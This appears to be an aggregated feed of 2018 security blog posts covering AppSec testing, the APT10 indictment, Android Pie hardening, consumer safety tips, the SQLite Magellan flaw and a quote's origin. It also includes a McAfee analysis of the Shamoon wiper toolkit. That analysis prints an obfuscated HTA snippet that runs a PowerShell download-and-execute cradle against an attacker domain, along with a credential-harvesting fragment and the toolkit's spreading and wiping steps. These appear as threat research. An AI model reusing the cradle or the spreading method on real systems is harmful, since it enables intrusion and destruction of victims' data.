As we can see, all of these concepts have their own unique differences, and yet, they are so closely tied together in the world of application security; flaws exist within a code base that’s being attacked, the flaw being that weakness, the vulnerability being the realization of it, and the exploit being how that vulnerability would be leveraged and attacked.

Testing Methods

Now that you have an understanding of the distinctions between these terms, you might be wondering how to test for flaws and vulnerabilities in your code. After all, step one is awareness, but step two is knowing how to find and prevent these defects from putting your data at risk.

Static Application Security Testing (or SAST) is going to help you find the flaws in your code that could be possible vulnerabilities. Static analysis estimates – but does not prove – the exploitability of these flaws so that you can prioritize which to fix first. Knowing whether or not these flaws are certain vulnerabilities takes more of an understanding of the context in which the application is being run and the architecture of the application.

Your next line of defense comes in the form of Dynamic Application Security Testing (DAST), and Manual Penetration Testing (commonly known as MPT). These testing methods are typically more familiar to developers, as they’ve historically been the common approaches for assessing against application vulnerabilities. Dynamic analysis and MPTs run against a live application, and because they’re testing the code behavior from the outside in, we can actually see if these vulnerabilities are exploitable.

The third type of assessment at your disposal is Software Composition Analysis (SCA). SCA focuses on identifying risks that might be introduced by open source code components and third party libraries. It does this by scanning against an inventory of known, documented vulnerabilities – like the National Vulnerability Database.

While each testing method has unique upsides and drawbacks, they all have their place within the software development lifecycle. By using all three together in an integrated manner, you’ll be able to assess when risk exists within an application, and furthermore, you’ll be protecting yourself at every stage within your SDLC.

To learn even more about these security defects discussed here, and how to remediate them once you’ve found them, check out this webinar.

Indictment of Chinese Hackers Underscores Need for Stronger Cybersecurity

Veracode Chinese Hackers Indicted Spearphishing

According to a newly unsealed indictment, two Chinese nationals working with the Chinese ministry of state security have been charged with hacking a number of U.S. government agencies and corporations. The court filing indicates that Zhu Hua and Zhang Jianguo, members of Advanced Persistent Threat 10 (APT10), used phishing techniques in order to steal intellectual property, confidential business data, and technological information between 2006 and 2018.  

The APT10 Group was able to access more than 40 computers to steal confidential data from the U.S. Department of the Navy, including the personally identifiable information of more than 100,000 Navy personnel. The NASA Goddard Space Center and the space agency’s Jet Propulsion Lab were also named in the filing, according to a report in TechCrunch.

Tailored and Convincing Spearphishing Gave APT10 Unfettered Access

Rather than taking a spray-and-pray approach to their attack, APT10 carefully selected their targets and created tailored email campaigns to trick the recipient into opening malicious Word document attachments and files. The emails appeared to originate from a trusted sender, the filenames and types legitimate, and pertained to something relevant to the victim. An example included in the indictment involved a helicopter manufacturer that received an email with the subject line, “C17 Antenna problems” that included a malicious Microsoft Word attachment named “12-204 Side Load testing.doc.”

This methodology created an air of safety and allowed the email recipients to open the emails and attachments without suspicion or question. The indictment indicates that the malware used in the campaigns typically included customized variants of a remote access Trojan (RAT), including one called Poison Ivy, and keystroke loggers used to steal usernames and passwords as users typed in their credentials.

The “Technology Theft Campaign”

Over the course of this campaign, members of APT10 – including Hua and Jianguo – gained access to approximately 90 computers belonging to commercial and defense technology companies, as well as U.S. Government agencies in at least 12 states. They stole hundreds of gigabytes of sensitive data and targeted the computers of companies across dozens of industries and technologies, including aviation, space and satellite, manufacturing, pharmaceutical, oil and gas exploration and production, communications, computer processing, and maritime.  

The “MSP Theft Campaign”

In 2014, the defendants and co-conspirators in APT10 hacked into the computers and networks for managed service providers (MSP) for businesses and governments around the world. Because MSPs are responsible for remotely managing their clients’ information technology infrastructure – like servers, storage, networking, consulting and support services – the attackers were able to steal intellectual property and confidential business data on a global scale. The indictment states that through one particular MSP, which supports operations for the Southern District of New York, the group was able to access data of clients from 12 different countries across dozens of industries, including banking and finance, healthcare, and biotechnology. The malware used in this campaign was programmed to communicate with domains hosted by DNS service providers that were assigned IP addresses of computers APT10 controlled. In total, the group registered roughly 1,300 unique malicious domains.

Stronger Security Hygiene Is Necessary to Avoid Digital Theft

Although prosecutions are unlikely, the details of the indictment clearly indicate that if a tech company is vulnerable, its valuable intellectual property and personal data can be taken.

“Tech companies aren’t ramping up their security to protect their IP and data commensurate with the value attackers put on the data,” said Veracode CTO Chris Wysopal. “Compromising endpoints with vulnerable Word Documents means there isn’t good endpoint hygiene. Microsoft has recently released Windows Sandbox for Windows Pro and Enterprise users.  It would be a good idea to open externally sourced Word Documents with Word running in Windows Sandbox.”

Android Pie à la mode: Security & Privacy

Posted by Vikrant Nanda and René Mayrhofer, Android Security & Privacy Team

[Cross-posted from the Android Developers Blog]


There is no better time to talk about Android dessert releases than the holidays because who doesn't love dessert? And what is one of our favorite desserts during the holiday season? Well, pie of course.

In all seriousness, pie is a great analogy because of how the various ingredients turn into multiple layers of goodness: right from the software crust on top to the hardware layer at the bottom. Read on for a summary of security and privacy features introduced in Android Pie this year.
Platform hardening
With Android Pie, we updated File-Based Encryption to support external storage media (such as, expandable storage cards). We also introduced support for metadata encryption where hardware support is present. With filesystem metadata encryption, a single key present at boot time encrypts whatever content is not encrypted by file-based encryption (such as, directory layouts, file sizes, permissions, and creation/modification times).

Android Pie also introduced a BiometricPrompt API that apps can use to provide biometric authentication dialogs (such as, fingerprint prompt) on a device in a modality-agnostic fashion. This functionality creates a standardized look, feel, and placement for the dialog. This kind of standardization gives users more confidence that they're authenticating against a trusted biometric credential checker.

New protections and test cases for the Application Sandbox help ensure all non-privileged apps targeting Android Pie (and all future releases of Android) run in stronger SELinux sandboxes. By providing per-app cryptographic authentication to the sandbox, this protection improves app separation, prevents overriding safe defaults, and (most significantly) prevents apps from making their data widely accessible.
Anti-exploitation improvements
With Android Pie, we expanded our compiler-based security mitigations, which instrument runtime operations to fail safely when undefined behavior occurs.

Control Flow Integrity (CFI) is a security mechanism that disallows changes to the original control flow graph of compiled code. In Android Pie, it has been enabled by default within the media frameworks and other security-critical components, such as for Near Field Communication (NFC) and Bluetooth protocols. We also implemented support for CFI in the Android common kernel, continuing our efforts to harden the kernel in previous Android releases.

Integer Overflow Sanitization is a security technique used to mitigate memory corruption and information disclosure vulnerabilities caused by integer operations. We've expanded our use of Integer Overflow sanitizers by enabling their use in libraries where complex untrusted input is processed or where security vulnerabilities have been reported.
Continued investment in hardware-backed security

One of the highlights of Android Pie is Android Protected Confirmation, the first major mobile OS API that leverages a hardware-protected user interface (Trusted UI) to perform critical transactions completely outside the main mobile operating system. Developers can use this API to display a trusted UI prompt to the user, requesting approval via a physical protected input (such as, a button on the device). The resulting cryptographically signed statement allows the relying party to reaffirm that the user would like to complete a sensitive transaction through their app.

We also introduced support for a new Keystore type that provides stronger protection for private keys by leveraging tamper-resistant hardware with dedicated CPU, RAM, and flash memory. StrongBox Keymaster is an implementation of the Keymaster hardware abstraction layer (HAL) that resides in a hardware security module. This module is designed and required to have its own processor, secure storage, True Random Number Generator (TRNG), side-channel resistance, and tamper-resistant packaging.

Other Keystore features (as part of Keymaster 4) include Keyguard-bound keys, Secure Key Import, 3DES support, and version binding. Keyguard-bound keys enable use restriction so as to protect sensitive information. Secure Key Import facilitates secure key use while protecting key material from the application or operating system. You can read more about these features in our recent blog post as well as the accompanying release notes.
Enhancing user privacy

User privacy has been boosted with several behavior changes, such as limiting the access background apps have to the camera, microphone, and device sensors. New permission rules and permission groups have been created for phone calls, phone state, and Wi-Fi scans, as well as restrictions around information retrieved from Wi-Fi scans. We have also added associated MAC address randomization, so that a device can use a different network address when connecting to a Wi-Fi network.

On top of that, Android Pie added support for encrypting Android backups with the user's screen lock secret (that is, PIN, pattern, or password). By design, this means that an attacker would not be able to access a user's backed-up application data without specifically knowing their passcode. Auto backup for apps has been enhanced by providing developers a way to specify conditions under which their app's data is excluded from auto backup. For example, Android Pie introduces a new flag to determine whether a user's backup is client-side encrypted.

As part of a larger effort to move all web traffic away from cleartext (unencrypted HTTP) and towards being secured with TLS (HTTPS), we changed the defaults for Network Security Configuration to block all cleartext traffic. We're protecting users with TLS by default, unless you explicitly opt-in to cleartext for specific domains. Android Pie also adds built-in support for DNS over TLS, automatically upgrading DNS queries to TLS if a network's DNS server supports it. This protects information about IP addresses visited from being sniffed or intercepted on the network level.


We believe that the features described in this post advance the security and privacy posture of Android, but you don't have to take our word for it. Year after year our continued efforts are demonstrably resulting in better protection as evidenced by increasing exploit difficulty and independent mobile security ratings. Now go and enjoy some actual pie while we get back to preparing the next Android dessert release!

Making Android more secure requires a combination of hardening the platform and advancing anti-exploitation techniques.


Acknowledgements: This post leveraged contributions from Chad Brubaker, Janis Danisevskis, Giles Hogben, Troy Kensinger, Ivan Lozano, Vishwath Mohan, Frank Salim, Sami Tolvanen, Lilian Young, and Shawn Willden.

How to Get Technology Working for You This Christmas

Harnessing the power of the internet and technology this Christmas may just be what you need to get over this extraordinarily stressful period. While many of you maybe all sorted for the big day, there are still many of us who aren’t.

Many of us are still attending daily Christmas gatherings, still working, still trying to entertain kids, shop & most importantly, work out what we are going to serve to 25 people on Christmas day!!

So, let me share with you my top tips on how we can all use the wonders of the internet and technology to get through:

  1. E-Cards

If you haven’t done these yet – and let’s be honest very few do now – then scrap this idea immediately. But if your guilt just can’t be silenced then check out ecards. I personally love Smilebox but Lifewire has put together a list of the top ecard sites. But remember, always use a reputable site so your recipients as more likely to open them. Cybercrims have been known to send unsuspecting recipients ecards with the aim of trying to extract their personal information.

  1. Online Gift Shopping

Getting to the bottom of the Christmas gift list takes time. So, if you still have presents to buy then avoid the crowds and get online. There are still plenty of retailers who are guaranteeing delivery before Christmas. So, make yourself a cup of tea and set the timer for an hour. You’ll be surprised how much you can get done when you have a deadline! Finder.com has put together a list of the top 50 Australian shopping sites – check it out! I do have to disclose I have a soft spot for Peter’s of Kensington, Country Road and Myer online. Great service and speedy delivery!

But please remember to observe safe online shopping habits. Only buy from trusted retailers, look for a padlock at the start of a web address to ensure transactions are encrypted, avoid offers that are ‘too good to be true’ and don’t ever use public Wi-Fi to do your shopping.

  1. Get Some Extra Help Online

If you haven’t yet used Airtasker to help you work through your to-do list, then you need to start ASAP. Airtasker brings jobs and helpers together in an easy to use app. If your house needs a clean or the garden needs a makeover before the relatives arrive, then log on and create a job and wait for Airtaskers to bid on it. So easy!

  1. Create an Online To-Do List

There’s nothing like a bit of planning to reduce pressure. Why not create a to-do list in Google Docs or an Excel spreadsheet to identify which family member is responsible for what on the big day? Alternatively, you could create your to-do list in an app like Todoist and then send each person’s task directly to their inbox? Very organised indeed!

So, let’s all take a deep breath. Christmas 2018 is going to be fantastic. Let’s get technology working for us so we can get through our to-do lists and be super parents – even though we all know they just don’t exist!

Merry Christmas

Alex xx

The post How to Get Technology Working for You This Christmas appeared first on McAfee Blogs.

The Results Are In: Fake Apps and Banking Trojans Are A Cybercriminal Favorite

Today, we are all pretty reliant on our mobile technology. From texting, to voice messaging, to mobile banking, we have a world of possibilities at our fingertips. But what happens when the bad guys take advantage of our reliance on mobile and IoT technology to threaten our cybersecurity? According to the latest McAfee Labs Threats Report, cybercriminals are leveraging fake apps and banking trojans to access users’ personal and financial information. In fact, our researchers saw an average of 480 new threats per minute and a sharp increase in malware targeting IoT devices during the last quarter. Let’s take a look at how these cyberthreats gained traction over the past few months.

While new mobile malware declined by 24% in Q3, our researchers did notice some unusual threats fueled by fake apps. Back in June, we observed a scam where crooks released YouTube videos with fake links disguised as leaked versions of Fortnite’s Android app. If a user clicked on the link to download this phony app, they would be asked to provide mobile verification. This verification process would prompt them to download app after app, putting money right in the cybercriminals’ pockets for increased app downloads.

Another fake app scheme that caught the attention of our researchers was Android/TimpDoor. This SMS phishing campaign tricked users into clicking on a link sent to them via text. The link would direct them to a fabricated web page urging them to download a fake voice messaging app. Once the victim downloaded the fake app, the malware would begin to collect the user’s device information. Android/TimpDoor would then be able to let cybercriminals use the victim’s device to access their home network.

Our researchers also observed some peculiar behavior among banking trojans, a type of malware that disguises itself as a genuine app or software to obtain a user’s banking credentials. In Q3, cybercriminals employed uncommon file types to carry out spam email campaigns, accounting for nearly 500,000 emails sent worldwide. These malicious phishing campaigns used phrases such as “please confirm” or “payment” in the subject line to manipulate users into thinking the emails were of high importance. If a user clicked on the message, the banking malware would be able to bypass the email protection system and infect the device. Banking trojans were also found using two-factor operations in web injects, or packages that can remove web page elements and prevent a user from seeing a security alert. Because these web injects removed the need for two-factor authentication, cybercriminals could easily access a victim’s banking credentials from right under their noses.

But don’t worry – there’s good news. By reflecting on the evolving landscape of cybersecurity, we can better prepare ourselves for potential threats. Therefore, to prepare your devices for schemes such as these, follow these tips:

  • Go directly to the source. Websites like YouTube are often prone to links for fake websites and apps so criminals can make money off of downloads. Avoid falling victim to these frauds and only download software straight from a company’s home page.
  • Click with caution. Only click on links in text messages that are from trusted sources. If you receive a text message from an unknown sender, stay cautious and avoid interacting with the message.
  • Use comprehensive security. Whether you’re using a mobile banking app on your phone or browsing the internet on your desktop, it’s important to safeguard all of your devices with an extra layer of security. Use a robust security software like McAfee Total Protection so you can connect with confidence.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Homeon Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post The Results Are In: Fake Apps and Banking Trojans Are A Cybercriminal Favorite appeared first on McAfee Blogs.

Shamoon Attackers Employ New Tool Kit to Wipe Infected Systems

Last week the McAfee Advanced Threat Research team posted an analysis of a new wave of Shamoon “wiper” malware attacks that struck several companies in the Middle East and Europe. In that analysis we discussed one difference to previous Shamoon campaigns. The latest version has a modular approach that allows the wiper to be used as a standalone threat.

After further analysis of the three versions of Shamoon and based on the evidence we describe here, we conclude that the Iranian hacker group APT33—or a group masquerading as APT33—is likely responsible for these attacks.

In the Shamoon attacks of 2016–2017, the adversaries used both the Shamoon Version 2 wiper and the wiper Stonedrill. In the 2018 attacks, we find the Shamoon Version 3 wiper as well as the wiper Filerase, first mentioned by Symantec.

These new wiper samples (Filerase) differ from the Shamoon Version 3, which we analyzed last week. The latest Shamoon appears to be part of a toolkit with several modules. We identified the following modules:

  • OCLC.exe: Used to read a list of targeted computers created by the attackers. This tool is responsible to run the second tool, spreader.exe, with the list of each targeted machine.
  • Spreader.exe: Used to spread the file eraser in each machine previously set. It also gets information about the OS version.
  • SpreaderPsexec.exe: Similar to spreader.exe but uses psexec.exe to remotely execute the wiper.
  • SlHost.exe: The new wiper, which browses the targeted system and deletes every file.

The attackers have essentially packaged an old version (V2) of Shamoon with an unsophisticated toolkit coded in .Net. This suggests that multiple developers have been involved in preparing the malware for this latest wave of attacks. In our last post, we observed that Shamoon is a modular wiper that can be used by other groups. With these recent attacks, this supposition seems to be confirmed. We have learned that the adversaries prepared months in advance for this attack, with the wiper execution as the goal.

This post provides additional insight about the attack and a detailed analysis of the .Net tool kit.

Geopolitical context

The motivation behind the attack is still unclear. Shamoon Version 1 attacked just two targets in the Middle East. Shamoon Version 2 attacked multiple targets in Saudi Arabia. Version 3 went after companies in the Middle East by using their suppliers in Europe, in a supply chain attack.

Inside the .Net wiper, we discovered the following ASCII art:

These characters resemble the Arabic text تَبَّتْ يَدَا أَبِي لَهَبٍ وَتَبَّ. This is a phrase from the Quran (Surah Masad, Ayat 1 [111:1]) that means “perish the hands of the Father of flame” or “the power of Abu Lahab will perish, and he will perish.” What does this mean in the context of a cyber campaign targeting energy industries in the Middle East?

Overview of the attack

 

How did the malware get onto the victim’s network?

We received intelligence that the adversaries had created websites closely resembling legitimate domains which carry job offerings. For example:

  • Hxxp://possibletarget.ddns.com:880/JobOffering.

Many of the URLs we discovered were related to the energy sector operating mostly in the Middle East. Some of these sites contained malicious HTML application files that execute other payloads. Other sites lured victims to login using their corporate credentials. This preliminary attack seems to have started by the end of August 2018, according to our telemetry, to gather these credentials.

A code example from one malicious HTML application file:

YjDrMeQhBOsJZ = “WS”

wcpRKUHoZNcZpzPzhnJw = “crip”

RulsTzxTrzYD = “t.Sh”

MPETWYrrRvxsCx = “ell”

PCaETQQJwQXVJ = (YjDrMeQhBOsJZ + wcpRKUHoZNcZpzPzhnJw + RulsTzxTrzYD + MPETWYrrRvxsCx)

OoOVRmsXUQhNqZJTPOlkymqzsA=new ActiveXObject(PCaETQQJwQXVJ)

ULRXZmHsCORQNoLHPxW = “cm”

zhKokjoiBdFhTLiGUQD = “d.e”

KoORGlpnUicmMHtWdpkRwmXeQN = “xe”

KoORGlpnUicmMHtWdp = “.”

KoORGlicmMHtWdp = “(‘http://mynetwork.ddns.net:880/*****.ps1’)

OoOVRmsXUQhNqZJTPOlkymqzsA.run(‘%windir%\\System32\\’ + FKeRGlzVvDMH + ‘ /c powershell -w 1 IEX (New-Object Net.WebClient)’+KoORGlpnUicmMHtWdp+’downloadstring’+KoORGlicmMHtWdp)

OoOVRmsXUQhNqZJTPOlkymqzsA.run(‘%windir%\\System32\\’ + FKeRGlzVvDMH + ‘ /c powershell -window hidden -enc

The preceding script opens a command shell on the victim’s machine and downloads a PowerShell script from an external location. From another location, it loads a second file to execute.

We discovered one of the PowerShell scripts. Part of the code shows they were harvesting usernames, passwords, and domains:

function primer {

if ($env:username -eq “$($env:computername)$”){$u=”NT AUTHORITY\SYSTEM”}else{$u=$env:username}

$o=”$env:userdomain\$u

$env:computername

$env:PROCESSOR_ARCHITECTURE

With legitimate credentials to a network it is easy to login and spread the wipers.

.Net tool kit

The new wave of Shamoon is accompanied by a .Net tool kit that spreads Shamoon Version 3 and the wiper Filerase.

This first component (OCLC.exe) reads two text files stored in two local directories. Directories “shutter” and “light” contain a list of targeted machines.

OCLC.exe starts a new hidden command window process to run the second component, spreader.exe, which spreads the Shamoon variant and Filerase with the concatenated text file as parameter.

The spreader component takes as a parameter the text file that contains the list of targeted machines and the Windows version. It first checks the Windows version of the targeted computers.

The spreader places the executable files (Shamoon and Filerase) into the folder Net2.

It creates a folder on remote computers: C:\\Windows\System32\Program Files\Internet Explorer\Signing.

The spreader copies the executables into that directory.

It runs the executables on the remote machine by creating a batch file in the administrative share \\RemoteMachine\admin$\\process.bat. This file contains the path of the executables. The spreader then sets up the privileges to run the batch file.

If anything fails, the malware creates the text file NotFound.txt, which contains the name of the machine and the OS version. This can be used by the attackers to track any issues in the spreading process.

The following screenshot shows the “execute” function:

If the executable files are not present in the folder Net2, it checks the folders “all” and Net4.

To spread the wipers, the attackers included an additional spreader using Psexec.exe, an administration tool used to remotely execute commands.

The only difference is that this spreader uses psexec, which is supposed to be stored in Net2 on the spreading machine. It could be used on additional machines to move the malware further.

The wiper contains three options:

  • SilentMode: Runs the wiper without any output.
  • BypassAcl: Escalates privileges. It is always enabled.
  • PrintStackTrace: Tracks the number of folders and files erased.

The BypassAcl option is always “true” even if the option is not specified. It enables the following privileges:

  • SeBackupPrivilege
  • SeRestorePrivilege
  • SeTakeOwnershipPrivilege
  • SeSecurityPrivilege

To find a file to erase, the malware uses function GetFullPath to get all paths.

It erases each folder and file.

The malware browses every file in every folder on the system.

To erase all files and folders, it first removes the “read only’ attributes to overwrite them.

It changes the creation, write, and access date and time to 01/01/3000 at 12:01:01 for each file.

The malware rewrites each file two times with random strings.

It starts to delete the files using the API CreateFile with the ACCESS_MASK DELETE flag.

Then it uses FILE_DISPOSITION_INFORMATION to delete the files.

The function ProcessTracker has been coded to track the destruction.

Conclusion

In the 2017 wave of Shamoon attacks, we saw two wipers; we see a similar feature in the December 2018 attacks. Using the “tool kit” approach, the attackers can spread the wiper module through the victims’ networks. The wiper is not obfuscated and is written in .Net code, unlike the Shamoon Version 3 code, which is encrypted to mask its hidden features.

Attributing this attack is difficult because we do not have all the pieces of the puzzle. We do see that this attack is in line with the Shamoon Version 2 techniques. Political statements have been a part of every Shamoon attack. In Version 1, the image of a burning American flag was used to overwrite the files. In Version 2, the picture of a drowned Syrian boy was used, with a hint of Yemeni Arabic, referring to the conflicts in Syria and Yemen. Now we see a verse from the Quran, which might indicate that the adversary is related to another Middle Eastern conflict and wants to make a statement.

When we look at the tools, techniques, and procedures used during the multiple waves, and by matching the domains and tools used (as FireEye described in its report), we conclude that APT33 or a group attempting to appear to be APT33 is behind these attacks.

 

Coverage

The files we detected during this incident are covered by the following signatures:

  • Trojan-Wiper
  • RDN/Generic.dx
  • RDN/Ransom

Indicators of compromise

Hashes

  • OCLC.exe: d9e52663715902e9ec51a7dd2fea5241c9714976e9541c02df66d1a42a3a7d2a
  • Spreader.exe: 35ceb84403efa728950d2cc8acb571c61d3a90decaf8b1f2979eaf13811c146b
  • SpreaderPsexec.exe: 2ABC567B505D0678954603DCB13C438B8F44092CFE3F15713148CA459D41C63F
  • Slhost.exe: 5203628a89e0a7d9f27757b347118250f5aa6d0685d156e375b6945c8c05eb8a

File paths and filenames

  • C:\net2\
  • C:\all\
  • C:\net4\
  • C:\windows\system32\
  • C:\\Windows\System32\Program Files\Internet Explorer\Signing
  • \\admin$\process.bat
  • NothingFound.txt
  • MaintenaceSrv32.exe
  • MaintenaceSrv64.exe
  • SlHost.exe
  • OCLC.exe
  • Spreader.exe
  • SpreaderPsexec.exe

Some command lines

  • cmd.exe /c “”C:\Program Files\Internet Explorer\signin\MaintenaceSrv32.bat
  • cmd.exe /c “ping -n 30 127.0.0.1 >nul && sc config MaintenaceSrv binpath= C:\windows\system32\MaintenaceSrv64.exe LocalService” && ping -n 10 127.0.0.1 >nul && sc start MaintenaceSrv
  • MaintenaceSrv32.exe LocalService
  • cmd.exe /c “”C:\Program Files\Internet Explorer\signin\MaintenaceSrv32.bat ” “
  • MaintenaceSrv32.exe service

 

 

 

 

 

The post Shamoon Attackers Employ New Tool Kit to Wipe Infected Systems appeared first on McAfee Blogs.

Political Campaigns Need Privacy Policies and Training

When I made the transition from working in American Politics to learning about Privacy, the first tidbit of information I was given was that there was a difference in terminology between the American  and the European practice. In America, we use the term Privacy but in Europe they use the term Data Protection. As I […]

The post Political Campaigns Need Privacy Policies and Training appeared first on Privacy Ref Blog.

Beyond Scanning: Don’t Let AppSec Ignorance Become Negligence

In recent months, as I’ve worked with more and more prospects and customers, I’ve started to see an interesting trend: As more agile dev teams become responsible for their own security posture, they are relying on the operations team to “plug an AppSec tool” into their CI/CD pipeline to resolve their AppSec. While I agree with the sentiment that security needs to be embedded in the build process, I am always surprised that a “tool integrated into a CI/CD pipeline” is as far as the planning typically goes. Saying that, I was told by one of my best mentors that consistency should never be a surprise.

When I ask these same teams, “once you plug a tool into your CI/CD and you get results, what are your next steps?” I am mainly met with little to no response. Basically, these teams are going from ignorance of their application security state, to knowledge of security-related defects in their code, to security negligence by not acting to address these risky defects.

I have even seen AppSec programs that check all the boxes – they have solid, prioritized app inventories; executive sponsorship; integrations; remediation and mitigation points; policy management; multiple testing techniques; and centralized reporting – yet some agile teams are stepping in and taking a “tool approach” that only focuses on scanning instead. This is not only short-sighted, but also reveals a knowledge gap surrounding what it takes to make an AppSec program successful as security hands the program to individual agile dev teams. When I check-in on these security teams, inevitably all the early momentum they leveraged to overcome cultural hurdles and foster a “security is everyone’s responsibility” mentality has come to a halt. This includes the aspirational goals around passing policy and establishing remediation checkpoints. This is not due to development doing the scanning directly (they should do this), but rather governance of the larger AppSec outcomes fading away. Ops seems more interested in how many scans they can do per day … with no further outcome.

Don’t fall into this trap. You can’t scan your way to secure code. Security teams still need to be a part of the security picture as scanning occurs in the CI/CD pipeline. Here are three key aspects of application security “beyond scanning” that will produce real risk reduction from your efforts:

Secure coding education:

The easiest flaw to fix is the one that is never introduced in the first place. However, most developers don’t have secure coding skills. While it is great to have a scanner built into the CI/CD pipeline, it is just as important now to shift testing “left.” With tools like Veracode’s Greenlight, developers can fix flaws in real time in their IDE while building their applications. In turn, developers learn as they code and reduce the number of flaws introduced over time. In addition, to help drive secure coding education, Veracode provides a number of options for sharing best practices, including instructor-led trainings such as lunch and learns, eLearning on AppSec, and developer workshops on secure coding.

Fixing what you find:

Ultimately, your AppSec program is not effective if you’re not fixing what you find. You can scan every piece of code you write, but without adequate training and guidance, you will not create more secure code. In fact, you will delay developer timelines and still produce vulnerable code. Enabling developers with both a scanning tool and remediation and mitigation guidance is key. At Veracode, we conduct over 5,000 consultation calls a year with development teams, guiding them through fixing flaws they have never had to address before. And we’ve found that after only one to two of these calls, developers’ secure coding know-how improves dramatically.

In addition, your AppSec program also needs to be set up to enable remediation guidance.

For instance, every scan completed should be assessed against a policy — not a policy that changes how you scan or what is discovered, but rather a filter of the results to see if you passed or failed based on the parameters you set for risk tolerance. This policy should also include: how often does a team need to scan, how long do they have to fix certain flaws based on severity/criticality, and what scanning techniques must be used. In addition, you need remediation time built in between scans. Just scanning multiple times a day and pulling results into a tracking system is not useful if no one has the bandwidth to fix anything. You are better off setting a realistic scanning schedule (once a day) so developers have time to fix what they find. You can increase scan frequency as you become more secure and are passing policy on a regular basis.

Scaling:

Can your security team help your development teams fix all the flaws their scans are finding? If you have multiple development teams working in different environments, this can be a nearly impossible task for one central security team. In addition, developers are naturally curious, so just giving them scan results without explaining the underlying technology finding the flaws will lead to push back.

Considering the skills shortage, engaging outside AppSec expertise goes a long way, both to establish your program’s goals and roadmap and keep it on track, and to guide you through fixing the flaws you find. We aren’t suggesting you replace your security team with consultants, but rather that you complement it with specialized AppSec expertise.

We’ve seen the difference this support makes: Veracode customers who work with our Security Program Managers grow their application coverage by 25 percent each year, decrease their time to deployment, and demonstrate better vulnerability detection and remediation metrics. In addition, Veracode has a fully staffed Advanced Integration Team. They work with global companies to help build out scanning in complex CI/CD environments that can vary by teams and regions. It is rare we see a one-and-done simple set-up that enables a full organization. Ultimately, our experienced Security Program Managers help you define the goals of your program, onboard and answer questions about Veracode products, and work with your teams to ensure that your program stays on track and continues to mature.

Learn more

Don’t let ignorance become negligence. Get details on what a mature, effective AppSec program looks like in our Everything You Need to Know About Maturing Your AppSec Program guide

SQLite Vulnerability May Be Putting Your Applications at Risk

Late last week, Tencent announced that researchers from its Blade Team had discovered a remote code execution (RCE) vulnerability in SQLite, dubbed Magellan. SQLite is a very popular embedded SQL server. It is one of the components inside many thousands of applications, including the Google Chromium browser. Google has since updated Chromium to contain the fixed version of SQLite, version 3.26.0, released on December 1. Although there are no reports of the vulnerability being executed in the wild, a situation where a high-impact vulnerability is found in a component that is in widespread use is usually a cause for alarm. This case, however, has some mitigating circumstances that will keep this from being another Heartbleed-size problem.

As discussed in previous posts, when we look at vulnerabilities in open source components, we need to distinguish between a component that contains a vulnerability and how that component is used by an application. Every development team that embedded SQLite needs to be doing this right now. It turns out that for an attacker to exploit this particular vulnerability in an application, they need to be able to manipulate queries that the application makes to SQLite. Chromium implements Web SQL, which allows an attacker to create a web page that will send SQL commands to the embedded SQLite code – thus making it vulnerable. If your application allows user input to construct SQL queries, then your application is likely vulnerable, too.

There are other situations where your application may be vulnerable. Allowing attackers to construct SQL queries sounds a lot like a SQL injection vulnerability.  If your app does have a SQLi vulnerability, you may now have a bigger problem with a far more serious RCE vulnerability if you’re using an outdated version of SQLite. If you’re using application security testing techniques, including SAST, DAST, and manual penetration testing and fixing issues found as a part of your development process, you may feel confident that your apps don’t have any SQLi vulnerabilities. Whether or not you have an AppSec program in place, the best thing that development teams can do is update to the latest version of SQLite.

This is true any time you determine that your application uses a component with a known vulnerability, and updating does not need to be a fire drill. Software composition analysis (SCA) can look at the open source code in your app and tell you if there are known vulnerabilities and if a vulnerable method is being called. Veracode’s SCA product uses control flow analysis to do this quickly, without a manual inspection of the components in use. If you find that your application or applications are not vulnerable, you can wait until there is a convenient time to update the component so that keeping current isn’t disruptive to your development schedule.

To learn more about how Veracode can help mitigate your organization’s open source risk, download our whitepaper: https://info.veracode.com/whitepaper-solving-your-open-source-risk-with-sourceclear.html

The Origin of the Quote “There Are Two Types of Companies”

While listening to a webcast this morning, I heard the speaker mention

There are two types of companies: those who have been hacked, and those who don’t yet know they have been hacked.

He credited Cisco CEO John Chambers but didn't provide any source.

That didn't sound right to me. I could think of two possible antecedents. so I did some research. I confirmed my memory and would like to present what I found here.

John Chambers did indeed offer the previous quote, in a January 2015 post for the World Economic Forum titled What does the Internet of Everything mean for security? Unfortunately, neither Mr Chambers nor the person who likely wrote the article for him decided to credit the author of this quote.

Before providing proper credit for this quote, we need to decide what the quote actually says. As noted in this October 2015 article by Frank Johnson titled Are there really only “two kinds of enterprises”?, there are really (at least) two versions of this quote:

A popular meme in the information security industry is, “There are only two types of companies: those that know they’ve been compromised, and those that don’t know.”

And the second is like unto it: “There are only two kinds of companies: those that have been hacked, and those that will be.”

We see that the first is a version of what Mr Chambers said. Let's call that 2-KNOW. The second is different. Let's call that 2-BE.

The first version, 2-KNOW, can be easily traced and credited to Dmitri Alperovitch. He stated this proposition as part of the publicity around his Shady RAT report, written while he worked at McAfee. For example, this 3 August 2011 story by Ars Technica, Operation Shady RAT: five-year hack attack hit 14 countries, quotes Dmitri in the following:

So widespread are the attacks that Dmitri Alperovitch, McAfee Vice President of Threat Research, said that the only companies not at risk are those who have nothing worth taking, and that of the world's biggest firms, there are just two kinds: those that know they've been compromised, and those that still haven't realized they've been compromised.

Dmitri used slightly different language in this popular Vanity Fair article from September 2011, titled Enter the Cyber-Dragon:

Dmitri Alperovitch, who discovered Operation Shady rat, draws a stark lesson: “There are only two types of companies—those that know they’ve been compromised, and those that don’t know. If you have anything that may be valuable to a competitor, you will be targeted, and almost certainly compromised.”

No doubt former FBI Director Mueller read this report (and probably spoke with Dmitri). He delivered a speech at RSA on 1 March 2012 that introduced question 2-BE into the lexicon, plus a little more:

For it is no longer a question of “if,” but “when” and “how often.”

I am convinced that there are only two types of companies: those that have been hacked and those that will be. 

And even they are converging into one category: companies that have been hacked and will be hacked again.  

Here we see Mr Mueller morphing Dmitri's quote, 2-KNOW, into the second, 2-BE. He also introduced a third variant -- "companies that have been hacked and will be hacked again." Let's call this version 2-AGAIN.

The very beginning of Mr Mueller's quote is surely a play on Kevin Mandia's long-term commitment to the inevitability of compromise. However, as far as I could find, Kevin did not use the "two companies" language.

One article that mentions version 2-KNOW and Kevin is this December 2014 Ars Technica article titled “Unprecedented” cyberattack no excuse for Sony breach, pros say. However, the article is merely citing other statements by Kevin along with the aphorism of version 2-KNOW.

